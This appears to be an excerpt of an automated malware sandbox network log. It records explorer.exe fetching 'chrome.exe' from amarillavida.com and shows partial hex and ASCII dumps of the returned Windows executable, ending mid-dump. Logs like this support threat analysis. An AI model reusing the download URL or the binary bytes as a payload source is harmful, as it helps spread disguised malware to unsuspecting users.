Jun 29, 2022 23:12:07.983689070 CEST	11356	IN	Data Raw: f4 83 c3 f7 57 7b d0 e5 7d 6f 30 88 d8 7f 77 b3 20 9b 48 04 2e 37 75 86 e8 69 4c ad 21 cc 6c 4d 8a 8d 4e 88 e3 61 50 14 6f 9f e1 b8 b7 67 4f 5e 58 07 ca 32 e8 55 05 21 e5 0d 70 d8 8a cc fa c3 a9 26 72 23 95 53 6c 3d fd 94 1a ea 83 13 06 4b 03 8d Data Ascii: W{}o0w H.7uiL!lMNaPogO^X2U!p&r#Sl=KI[uj/?vS"@;n'm-Y,'tFVQ<Y=1vW1kxe~O;E$E^N%CL{o&yAU]1oo%9%<{?[d
Jun 29, 2022 23:12:07.983730078 CEST	11358	IN	Data Raw: 6b 14 3b 0e 23 e7 32 92 6f cf ce 99 54 af 1b b8 27 f2 4c e7 87 fa 9b 01 a1 db 11 39 ec 43 1d ec 75 b6 8f 72 38 84 69 98 ff d3 58 2a 7c 38 19 b0 53 fb 46 b3 65 7c 70 11 f8 b4 b6 b3 a5 ee 62 0d 30 f8 73 ec ee a3 30 bb 31 53 82 9d 53 bf e6 46 1b d8 Data Ascii: k;#2oT'L9Cur8iX\|8SFe\|pb0s01SSFf29sFDOC\:2A;>=lZW4y@W4Vk;~u&cq#{>;>DhLGy-HPhQd/%x^j$O=qgl
Jun 29, 2022 23:12:07.983753920 CEST	11359	IN	Data Raw: 5a 1f 8f b2 4c 25 f6 9d ef 1c c3 e9 63 3c 34 1a dd cc fc f5 3e f3 cc 42 f5 4d db a2 7a 4d fa d6 a0 59 c8 74 54 da 95 98 38 64 f0 77 91 5f 78 85 bb d3 92 4f ec 74 d3 74 46 d7 ef b1 71 2e 83 f5 a7 a2 b7 34 56 15 13 e3 fb 80 02 99 8d 24 b7 c0 6c 61 Data Ascii: ZL%c<4>BMzMYtT8dw_xOttFq.4V$laH$hT,ZJ6t,~]^?5zbC`j:l[xI~{R&Zc'VKu<rz{!!2K(h5hu}[u]
Jun 29, 2022 23:12:08.052299023 CEST	11361	IN	Data Raw: 49 47 8d 86 e1 0b 3b 10 90 af 06 e7 2e 4a 4f 4d 5d 5f 7f ba c8 f1 e6 01 94 a1 7e cd d9 d9 19 eb df ca 44 ef 34 e2 6d 49 68 7a 5d ca 95 f1 47 6a e6 80 0c c9 f8 af 4a bc 70 09 e0 80 1d 2b 5d 00 33 7c 3b c6 ea 9a 16 ad 3e e5 4f 65 03 21 f3 5c 2f 70 Data Ascii: IG;.JOM]_~D4mIhz]GjJp+]3\|;>Oe!\/pncr"i+ 0cki2-#%"r<WIyOg?^kdg=pzq-w05an1QP`UJB[lqX`tFsm
Jun 29, 2022 23:12:08.052340984 CEST	11362	IN	Data Raw: e5 52 52 ed 66 e8 0c 6c 34 ef bd 8b f3 c4 dd e4 d8 20 05 81 d1 f7 ce fe df f6 43 a7 a6 aa df 56 c5 9b 85 8f 32 96 c7 4b 1e 52 87 e6 e1 15 01 71 5e 2d ab 97 33 cd 72 10 dc 73 c7 de c8 7c f8 3d d5 ea be fd c0 19 fb 99 13 44 ca da 47 ed db ce 91 73 Data Ascii: RRfl4 CV2KRq^-3rs\|=DGs{Ywl;EQjmD_(pc\rVU#V*Gu{g<bJ1Bw8fDJay(,~J,,nqX\|oz4QaH-
Jun 29, 2022 23:12:08.224545956 CEST	11363	IN	Data Raw: be 2b 3d f2 c9 bf f7 02 7f 4b 80 a1 31 2b b9 68 52 0f 8e 2f 45 70 b3 9e 56 fc f6 0f 58 45 cb 0e d5 13 dc ef a4 00 b7 bc 8f c8 c5 9b 09 81 58 bb 9a 3c 93 84 9c d3 8a 02 fd ae d8 e0 51 02 24 eb f4 53 6f b6 d2 74 0e 41 5c 58 b0 17 a1 1e d4 6f 6b 88 Data Ascii: +=K1+hR/EpVXEX<Q$SotA\Xokr{Nk_:puB>%+)MoUG=e2@,d/M Uc72Yl:#+\Lw-j\ES=jo:\|b8"mi

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49768	206.221.182.74	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2022-06-29 21:11:52 UTC	0	OUT	GET /upload/chrome.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: amarillavida.com
2022-06-29 21:11:52 UTC	0	IN	HTTP/1.1 200 OK Connection: close Content-Type: application/x-msdownload Last-Modified: Wed, 29 Jun 2022 19:39:03 GMT Accept-Ranges: bytes Content-Length: 287744 Date: Wed, 29 Jun 2022 21:11:52 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
2022-06-29 21:11:52 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 e4 4f 8e 17 85 21 dd 17 85 21 dd 17 85 21 dd aa ca b7 dd 16 85 21 dd 09 d7 b4 dd 0a 85 21 dd 09 d7 a2 dd 9d 85 21 dd 30 43 5a dd 14 85 21 dd 17 85 20 dd cf 85 21 dd 09 d7 a5 dd 29 85 21 dd 09 d7 b5 dd 16 85 21 dd 09 d7 b0 dd 16 85 21 dd 52 69 63 68 17 85 21 dd 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cb 66 43 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 00 03 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SO!!!!!!0CZ! !)!!!Rich!PELfC`
2022-06-29 21:11:52 UTC	1	IN	Data Raw: ec 05 03 00 f8 05 03 00 04 06 03 00 1a 06 03 00 28 06 03 00 36 06 03 00 52 06 03 00 68 06 03 00 7a 06 03 00 98 06 03 00 a4 06 03 00 b2 06 03 00 c0 06 03 00 d4 06 03 00 ea 06 03 00 04 07 03 00 16 07 03 00 2a 07 03 00 3e 07 03 00 54 07 03 00 68 07 03 00 7a 07 03 00 8e 07 03 00 a4 07 03 00 b4 07 03 00 c4 07 03 00 d2 07 03 00 e4 07 03 00 02 08 03 00 16 08 03 00 28 08 03 00 3e 08 03 00 4a 08 03 00 5a 08 03 00 6e 08 03 00 7c 08 03 00 90 08 03 00 ac 08 03 00 ba 08 03 00 c6 08 03 00 dc 08 03 00 f2 08 03 00 06 09 03 00 14 09 03 00 26 09 03 00 42 09 03 00 62 09 03 00 6e 09 03 00 7e 09 03 00 9c 09 03 00 b6 09 03 00 c6 09 03 00 de 09 03 00 fe 09 03 00 14 0a 03 00 32 0a 03 00 3a 0a 03 00 52 0a 03 00 6a 0a 03 00 7c 0a 03 00 88 0a 03 00 9c 0a 03 00 b0 0a 03 00 ce 0a 03 Data Ascii: (6Rhz*>Thz(>JZn\|&Bbn~2:Rj\|
2022-06-29 21:11:52 UTC	16	IN	Data Raw: 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 72 00 6f 00 72 00 22 00 29 00 00 00 00 00 25 73 28 25 64 29 20 3a 20 25 73 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 6e 00 22 00 29 00 00 00 0d 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 61 00 74 00 5f 00 73 00 28 00 73 00 7a 00 4c 00 69 00 6e 00 65 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 22 00 5c 00 72 00 22 00 29 00 00 00 73 Data Ascii: tDbgReport: String too long or IO Error")%s(%d) : %sstrcat_s(szLineMessage, 4096, "\n")strcat_s(szLineMessage, 4096, "\r")s
2022-06-29 21:11:52 UTC	32	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 68 00 28 00 28 00 28 00 28 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: h((((
2022-06-29 21:11:52 UTC	48	IN	Data Raw: dc 83 7d dc 00 75 1e 68 40 26 40 00 6a 00 6a 7b 68 a8 26 40 00 6a 02 e8 4a f8 ff ff 83 c4 14 83 f8 01 75 01 cc 83 7d dc 00 75 3a e8 f6 43 00 00 c7 00 22 00 00 00 6a 00 6a 7b 68 a8 26 40 00 68 90 26 40 00 68 40 26 40 00 e8 58 f6 ff ff 83 c4 14 c7 45 cc 22 00 00 00 8d 4d f0 e8 36 01 00 00 8b 45 cc eb 4c e8 bc 43 00 00 c7 00 2a 00 00 00 e8 b1 43 00 00 8b 08 89 4d c8 8d 4d f0 e8 14 01 00 00 8b 45 c8 eb 2a 83 7d 08 00 74 08 8b 55 08 8b 45 e0 89 02 c7 45 c4 00 00 00 00 8d 4d f0 e8 f2 00 00 00 8b 45 c4 eb 08 8d 4d f0 e8 e5 00 00 00 8b e5 5d c3 cc 8b ff 55 8b ec 51 89 4d fc 8b 45 fc c6 40 0c 00 83 7d 08 00 0f 85 a6 00 00 00 e8 21 84 00 00 8b 4d fc 89 41 08 8b 55 fc 8b 42 08 8b 4d fc 8b 50 6c 89 11 8b 45 fc 8b 48 08 8b 55 fc 8b 41 68 89 42 04 8b 4d fc 8b 11 3b 15 Data Ascii: }uh@&@jj{h&@jJu}u:C"jj{h&@h&@h@&@XE"M6ELCCMME}tUEEMEM]UQME@}!MAUBMPlEHUAhBM;
2022-06-29 21:11:52 UTC	64	IN	Data Raw: ff 8b e5 5d c3 cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 a4 01 00 00 81 f9 00 01 00 00 72 1f 83 3d 28 0c b3 00 00 74 16 57 56 83 e7 0f 83 e6 0f 3b fe 5e 5f 75 08 5e 5f 5d e9 59 fc 00 00 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 64 0d 41 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 78 0c 41 00 ff 24 8d 74 0d 41 00 90 ff 24 8d f8 0c 41 00 90 88 0c 41 00 b4 0c 41 00 d8 0c 41 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 64 0d 41 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 64 0d 41 00 90 23 d1 8a 06 88 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 Data Ascii: ]UWVuM};v;r=(tWV;^_u^_]Yur*$dAr$xA$tA$AAAA#FGFGr$dAI#FGr$dA#
2022-06-29 21:11:52 UTC	80	IN	Data Raw: cc cc cc cc cc cc 8b ff 55 8b ec ff 15 7c 12 40 00 5d c2 04 00 cc 8b ff 55 8b ec 51 a1 14 1a 44 00 50 ff 15 74 12 40 00 89 45 fc 83 7d fc 00 75 22 8b 0d 70 01 b3 00 51 e8 29 ff ff ff 83 c4 04 89 45 fc 8b 55 fc 52 a1 14 1a 44 00 50 ff 15 80 12 40 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 68 84 48 40 00 e8 9e fe ff ff 83 c4 04 89 45 fc 83 7d fc 00 75 0c e8 ed 01 00 00 33 c0 e9 dc 01 00 00 68 04 49 40 00 8b 45 fc 50 ff 15 70 12 40 00 a3 6c 01 b3 00 68 f8 48 40 00 8b 4d fc 51 ff 15 70 12 40 00 a3 70 01 b3 00 68 ec 48 40 00 8b 55 fc 52 ff 15 70 12 40 00 a3 74 01 b3 00 68 e4 48 40 00 8b 45 fc 50 ff 15 70 12 40 00 a3 78 01 b3 00 83 3d 6c 01 b3 00 00 74 1b 83 3d 70 01 b3 00 00 74 12 83 3d 74 01 b3 00 00 74 09 83 3d 78 01 Data Ascii: U\|@]UQDPt@E}u"pQ)EURDP@E]UhH@E}u3hI@EPp@lhH@MQp@phH@URp@thH@EPp@x=lt=pt=tt=x
2022-06-29 21:11:52 UTC	96	IN	Data Raw: 15 f8 fc ff ff 88 81 1d 01 00 00 eb 5d 8b 8d ec fa ff ff 0f b7 94 4d f8 fd ff ff 83 e2 02 74 3a 8b 45 08 03 85 ec fa ff ff 0f b6 48 1d 83 c9 20 8b 55 08 03 95 ec fa ff ff 88 4a 1d 8b 45 08 03 85 ec fa ff ff 8b 8d ec fa ff ff 8a 94 0d f8 fb ff ff 88 90 1d 01 00 00 eb 10 8b 45 08 03 85 ec fa ff ff c6 80 1d 01 00 00 00 e9 32 ff ff ff e9 d0 00 00 00 c7 85 ec fa ff ff 00 00 00 00 eb 0f 8b 8d ec fa ff ff 83 c1 01 89 8d ec fa ff ff 81 bd ec fa ff ff 00 01 00 00 0f 83 a5 00 00 00 83 bd ec fa ff ff 41 72 3f 83 bd ec fa ff ff 5a 77 36 8b 55 08 03 95 ec fa ff ff 0f b6 42 1d 83 c8 10 8b 4d 08 03 8d ec fa ff ff 88 41 1d 8b 95 ec fa ff ff 83 c2 20 8b 45 08 03 85 ec fa ff ff 88 90 1d 01 00 00 eb 58 83 bd ec fa ff ff 61 72 3f 83 bd ec fa ff ff 7a 77 36 8b 4d 08 03 8d ec Data Ascii: ]Mt:EH UJEE2Ar?Zw6UBMA EXar?zw6M
2022-06-29 21:11:52 UTC	112	IN	Data Raw: 89 45 f0 eb d8 8b 4d f0 2b 4d e8 83 c1 01 89 4d fc 68 8c 00 00 00 68 dc 66 40 00 6a 02 8b 55 fc 52 e8 70 13 ff ff 83 c4 10 89 45 f0 83 7d f0 00 75 0e 8b 45 e8 50 ff 15 90 11 40 00 33 c0 eb 25 8b 4d fc 51 8b 55 e8 52 8b 45 f0 50 e8 b5 3f ff ff 83 c4 0c 8b 4d e8 51 ff 15 90 11 40 00 8b 45 f0 eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 d8 f9 42 00 68 d0 09 41 00 64 a1 00 00 00 00 50 83 c4 84 53 56 57 a1 6c 16 44 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 8d 45 a0 50 ff 15 64 12 40 00 c7 45 fc fe ff ff ff eb 2c b8 01 00 00 00 c3 8b 65 e8 c7 85 7c ff ff ff ff ff ff ff c7 45 fc fe ff ff ff 8b 85 7c ff ff ff e9 16 04 00 00 c7 45 fc fe ff ff ff 68 88 00 00 00 68 0c 67 40 00 6a 02 6a 40 Data Ascii: EM+MMhhf@jURpE}uEP@3%MQUREP?MQ@E3]UjhBhAdPSVWlD1E3PEdeEEPd@E,e\|E\|Ehhg@jj@
2022-06-29 21:11:52 UTC	128	IN	Data Raw: 01 8b 55 08 52 e8 4c f6 ff ff 83 c4 0c 89 45 cc eb 1a 6a 01 8b 45 Data Ascii: URLEjE
2022-06-29 21:11:52 UTC	128	IN	Data Raw: 08 50 8d 4d e4 e8 a6 c1 fe ff 50 e8 80 f5 ff ff 83 c4 0c 89 45 cc 83 7d cc 00 74 2c 8d 4d e4 e8 8c c1 fe ff 8b 08 8b 91 cc 00 00 00 8b 45 08 0f b6 0c 02 89 4d e0 8d 4d e4 e8 42 c1 fe ff 8b 45 e0 e9 2a 01 00 00 eb 16 8b 55 08 89 55 dc 8d 4d e4 e8 2a c1 fe ff 8b 45 dc e9 12 01 00 00 8d 4d e4 e8 4a c1 fe ff 8b 00 83 b8 ac 00 00 00 01 7e 44 8d 4d e4 e8 37 c1 fe ff 50 8b 4d 08 c1 f9 08 81 e1 ff 00 00 00 51 e8 a4 6f 00 00 83 c4 08 85 c0 74 22 8b 55 08 c1 fa 08 81 e2 ff 00 00 00 88 55 f8 8a 45 08 88 45 f9 c6 45 fa 00 c7 45 f4 02 00 00 00 eb 1c e8 56 03 ff ff c7 00 2a 00 00 00 8a 4d 08 88 4d f8 c6 45 f9 00 c7 45 f4 01 00 00 00 6a 01 8d 4d e4 e8 d5 c0 fe ff 8b 10 8b 42 04 50 6a 03 8d 4d fc 51 8b 55 f4 52 8d 45 f8 50 68 00 01 00 00 8d 4d e4 e8 b4 c0 fe ff 8b 08 8b Data Ascii: PMPE}t,MEMMBEUUMEMJ~DM7PMQot"UUEEEEV*MMEEjMBPjMQUREPhM
2022-06-29 21:11:52 UTC	144	IN	Data Raw: 0a 8b 45 fc 83 c0 01 89 45 fc 8b 4d f8 83 c1 01 89 4d f8 83 7d 08 00 76 08 8b 55 f8 3b 55 10 72 a3 8b 45 f8 3b 45 10 72 6c 8b 4d 0c c6 01 00 8b 55 f8 3b 55 10 1b c0 f7 d8 89 45 d8 75 21 68 38 84 40 00 6a 00 68 8e 00 00 00 68 20 85 40 00 6a 02 e8 08 78 fe ff 83 c4 14 83 f8 01 75 01 cc 83 7d d8 00 75 30 e8 b4 c3 fe ff c7 00 22 00 00 00 6a 00 68 8e 00 00 00 68 20 85 40 00 68 0c 85 40 00 68 38 84 40 00 e8 13 76 fe ff 83 c4 14 b8 22 00 00 00 eb 45 8b 55 fc c6 02 00 8b 45 fc 83 e8 01 89 45 fc 8b 4d fc 8a 11 88 55 f3 8b 45 fc 8b 4d ec 8a 11 88 10 8b 45 ec 8a 4d f3 88 08 8b 55 fc 83 ea 01 89 55 fc 8b 45 ec 83 c0 01 89 45 ec 8b 4d ec 3b 4d fc 72 cc 33 c0 8b e5 5d c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 6c a1 6c 16 44 00 33 c5 89 45 Data Ascii: EEMM}vU;UrE;ErlMU;UEu!h8@jhh @jxu}u0"jhh @h@h8@v"EUEEMUEMEMUUEEM;Mr3]UllD3E
2022-06-29 21:11:52 UTC	160	IN	Data Raw: 8d 4d c0 e8 86 41 fe ff 8b 85 08 fd ff ff e9 bc 07 00 00 e9 e8 04 00 00 8b 55 f0 83 e2 20 74 12 8b 85 68 fd ff ff 66 8b 8d b4 fd ff ff 66 89 08 eb 0e 8b 95 68 fd ff ff 8b 85 b4 fd ff ff 89 02 c7 45 d8 01 00 00 00 e9 b4 04 00 00 c7 45 d4 01 00 00 00 0f be 8d af fd ff ff 83 c1 20 88 8d af fd ff ff 8b 55 f0 83 ca 40 89 55 f0 8d 85 b8 fd ff ff 89 45 fc c7 45 bc 00 02 00 00 83 7d d0 00 7d 09 c7 45 d0 06 00 00 00 eb 2b 83 7d d0 00 75 15 0f be 8d af fd ff ff 83 f9 67 75 09 c7 45 d0 01 00 00 00 eb 10 81 7d d0 00 02 00 00 7e 07 c7 45 d0 00 02 00 00 81 7d d0 a3 00 00 00 7e 42 68 da 06 00 00 68 34 64 40 00 6a 02 8b 55 d0 81 c2 5d 01 00 00 52 e8 b4 52 fe ff 83 c4 10 89 45 e0 83 7d e0 00 74 14 8b 45 e0 89 45 fc 8b 4d d0 81 c1 5d 01 00 00 89 4d bc eb 07 c7 45 d0 a3 00 Data Ascii: MAU thffhEE U@UEE}}E+}uguE}~E}~Bhh4d@jU]RRE}tEEM]ME
2022-06-29 21:11:52 UTC	176	IN	Data Raw: 64 40 00 6a 02 e8 54 f8 fd ff 83 c4 14 83 f8 01 75 01 cc 83 bd 9c fb ff ff 00 75 46 e8 fd 43 fe ff c7 00 16 00 00 00 6a 00 68 02 04 00 00 68 f0 64 40 00 68 b8 9a 40 00 68 a8 27 40 00 e8 5c f6 fd ff 83 c4 14 c7 85 40 fb ff ff ff ff ff ff 8d 4d c0 e8 37 01 fe ff 8b 85 40 fb ff ff e9 00 10 00 00 33 c0 83 7d 0c 00 0f 95 c0 89 85 98 fb ff ff 83 bd 98 fb ff ff 00 75 21 68 80 28 40 00 6a 00 68 07 04 00 00 68 f0 64 40 00 6a 02 e8 cc f7 fd ff 83 c4 14 83 f8 01 75 01 cc 83 bd 98 fb ff ff 00 75 46 e8 75 43 fe ff c7 00 16 00 00 00 6a 00 68 07 04 00 00 68 f0 64 40 00 68 b8 9a 40 00 68 80 28 40 00 e8 d4 f5 fd ff 83 c4 14 c7 85 3c fb ff ff ff ff ff ff 8d 4d c0 e8 af 00 fe ff 8b 85 3c fb ff ff e9 78 0f 00 00 c7 85 b4 fb ff ff 00 00 00 00 c7 45 dc 00 00 00 00 c7 85 a4 fb Data Ascii: d@jTuuFCjhhd@h@h'@\@M7@3}u!h(@jhhd@juuFuCjhhd@h@h(@<M<xE
2022-06-29 21:11:52 UTC	192	IN	Data Raw: 50 49 6e 66 6f 00 db 02 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 43 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 fc 03 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 83 01 47 65 74 43 6f 6e 73 6f 6c 65 43 50 00 00 95 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 54 03 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 aa 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 49 64 00 4f 02 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 bf 01 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 00 4b 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 c1 01 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 e8 03 53 65 74 48 61 6e 64 6c 65 43 6f 75 6e 74 00 Data Ascii: PInfoIsValidCodePageCCloseHandleSetStdHandleGetConsoleCPGetConsoleModeTQueryPerformanceCounterGetCurrentProcessIdOGetSystemTimeAsFileTimeGetEnvironmentStringsKFreeEnvironmentStringsWGetEnvironmentStringsWSetHandleCount
2022-06-29 21:11:52 UTC	208	IN	Data Raw: dd fd fc c6 fd cf 18 a9 1b 62 29 88 fc ae f0 ff 53 f1 30 56 3a 74 1e bc 1b 6d 90 5f d2 28 19 f3 06 d2 85 9f bc b9 e1 a6 77 a3 21 71 13 e1 90 c5 22 fd 8b 6f 6e c5 8f 3b c2 91 a7 0e 92 2e 98 77 fa b1 4d 13 1e 5d a8 bd df 7e 9b 80 0b 05 fe e7 51 56 45 38 64 bf f1 bf 8a 8c 85 a3 cb 7f 02 f9 70 93 77 3c 5e 80 43 73 da 5a aa 12 8f e7 4b bf 24 66 24 97 77 15 dd 5a 17 d1 c3 f1 10 e1 2d 87 a0 57 47 1a 7e a7 71 8e b0 39 8b 13 2e 77 15 d0 66 59 39 c4 b1 42 39 e7 0f cb e8 f7 1b 52 08 a5 23 02 f0 88 75 77 69 79 6e 1e a4 78 06 23 8a 18 80 49 22 0c c8 92 9a b1 e6 bb 50 35 a1 c1 49 eb 1f 29 f6 6a dc 25 89 58 2c ae fa 96 62 f8 14 54 bf 8a 14 da a2 4b bd f0 fd 97 e9 f1 ca eb 7d 5d fd c3 20 33 83 e2 4c fe 2f 22 df 52 06 77 2c c2 80 27 65 ed 98 7b 7c 9b 9d 0f dd 41 8f df fa Data Ascii: b)S0V:tm_(w!q"on;.wM]~QVE8dpw<^CsZK$f$wZ-WG~q9.wfY9B9R#uwiynx#I"P5I)j%X,bTK}] 3L/"Rw,'e{\|A
2022-06-29 21:11:52 UTC	224	IN	Data Raw: 94 26 f9 e8 14 a3 55 00 72 d7 a0 14 29 dc 47 f5 1b 70 99 1e 24 83 82 60 d5 2e 67 e2 66 9e 94 d2 c0 64 62 c7 a3 ab d3 b5 83 a6 86 7d 9b 46 f5 b1 a8 f1 a0 a4 0e 54 aa 9d 13 e1 55 7e ce e6 68 a4 97 2b 67 e2 f6 5a 0f aa 67 1c 0d b2 c9 a2 8e 2a 64 d9 32 54 f7 bf 07 9d 82 cc 9f f5 05 25 a4 d5 33 dd 26 e0 f2 12 6b 61 f5 4f 10 bf e8 62 2a ba 20 3a 53 17 b4 94 00 b9 e1 ee 55 a8 67 4e 38 4a a6 4a 48 7e 93 8a 42 5c 6e a9 9b c3 bd b4 9f 61 ab fc 75 d9 77 95 44 fe a1 27 69 39 d7 ea ef d0 53 fe 83 a7 6a a6 d2 32 78 3d 0e dd 2b 11 88 f4 82 7f f8 03 9d 56 16 a5 58 65 ff b0 1c 17 7c f2 24 92 b3 d7 12 e5 58 6f bc a6 8d 72 92 f9 30 b7 c4 16 cb 48 2f 98 71 49 c6 94 f4 ab de 5d a4 8f c6 c7 b6 42 b6 04 98 d2 ea fb 5d e0 6d 96 b7 73 5a b7 a1 78 34 d6 eb 05 8e 80 42 42 cf b0 08 Data Ascii: &Ur)Gp$`.gfdb}FTU~h+gZgd2T%3&kaOb :SUgN8JJH~B\nauwD'i9Sj2x=+VXe\|$Xor0H/qI]B]msZx4BB
2022-06-29 21:11:52 UTC	240	IN	Data Raw: 11 80 fb 31 f8 05 da 7f 83 85 12 6c 76 39 93 32 c6 d5 6b aa d1 d6 02 9e b5 92 a8 b8 4c fa d1 be aa d9 63 af 78 12 99 b3 de d8 32 1c d5 37 4f b3 7b 3c 25 23 9f b3 88 e9 70 31 8d 56 29 29 d6 92 c9 0c eb 9e fc ca 61 96 b6 4c 0b 25 95 9e 3b 34 0f 0e 8f 79 b2 79 79 b9 d8 6c cb 14 15 58 46 f8 98 ac f2 e1 7e fa 09 24 1b 1e 13 b8 1b ac a1 fa 8b 88 39 f6 e3 38 fb ef ee 39 94 0d 14 e9 57 09 9e b5 7e ad ef 6e 28 b8 98 eb d5 0a 69 b1 43 c4 ff ef a7 bd dc e5 a8 21 9f 56 7a 09 a6 2f 82 3f f1 96 a4 11 97 c9 51 23 e0 0b 34 c4 6b b3 b9 5a 26 87 6c 0b 49 75 78 d9 49 b8 a9 f7 34 3d e2 91 88 6e 6d bb 3a ee 51 0e 9f 22 87 98 59 da e8 01 a5 12 6f 44 6e 40 37 f8 b7 11 aa 88 d6 d2 5c 64 4e 7e a7 28 13 12 e3 69 60 69 cd 2e 26 87 57 78 16 25 8a 68 eb 60 fe d2 bc 27 4e 61 ba 21 c2 Data Ascii: 1lv92kLcx27O{<%#p1V))aL%;4yyylXF~$989W~n(iC!Vz/?Q#4kZ&lIuxI4=nm:Q"YoDn@7\dN~(i`i.&Wx%h`'Na!
2022-06-29 21:11:52 UTC	256	IN	Data Raw: 84 7e b5 e8 ba 96 ae fa 71 37 ba 68 18 bb Data Ascii: ~q7h
2022-06-29 21:11:52 UTC	256	IN	Data Raw: d7 e6 77 fb 1f 87 47 4c 96 39 12 1d 1a ce 9b 8a f8 72 e3 7b 6c cd e0 6d ee e4 c3 47 fb 03 4e e1 9e a4 fe d1 e0 8b 12 a3 fe c9 7a f8 3e 16 14 85 9c 5c 30 9c 8c 19 e5 fc 94 82 10 9a e9 62 21 94 b6 dc 29 ec 4d ee 04 8d e9 d3 00 1b 57 ec 54 30 48 63 20 52 40 bb bf 72 bc 97 3b c1 d3 54 21 ba 32 b2 b6 f5 5f 8f 63 43 50 2f be b0 ff 2c e8 8c e5 13 9f b0 14 ea 72 07 ff f9 59 a9 1e ff c2 0b 45 55 aa ab 35 7f 55 2c 75 ed 90 4e 60 4a ee cb f0 65 c3 c1 2f 4f 24 db 58 ef c7 8d ed cf 68 a6 6c a0 58 57 1d 5e cf fa 4f fe 02 91 49 43 e8 0b b3 8f 66 91 b1 b2 d6 12 5c 77 0d 45 f2 12 26 a8 80 03 88 64 f4 f8 c3 0f 26 f6 b2 84 7d a9 61 70 60 4c 5f ed a5 fc b0 b7 c3 41 3e fa cf f9 76 90 b6 5d 56 6d 62 0c 29 3b 2c a2 3e 4c 45 c5 a0 de f9 3c 72 c8 c8 4a 23 1a 0e 54 9c b2 5d 2d da 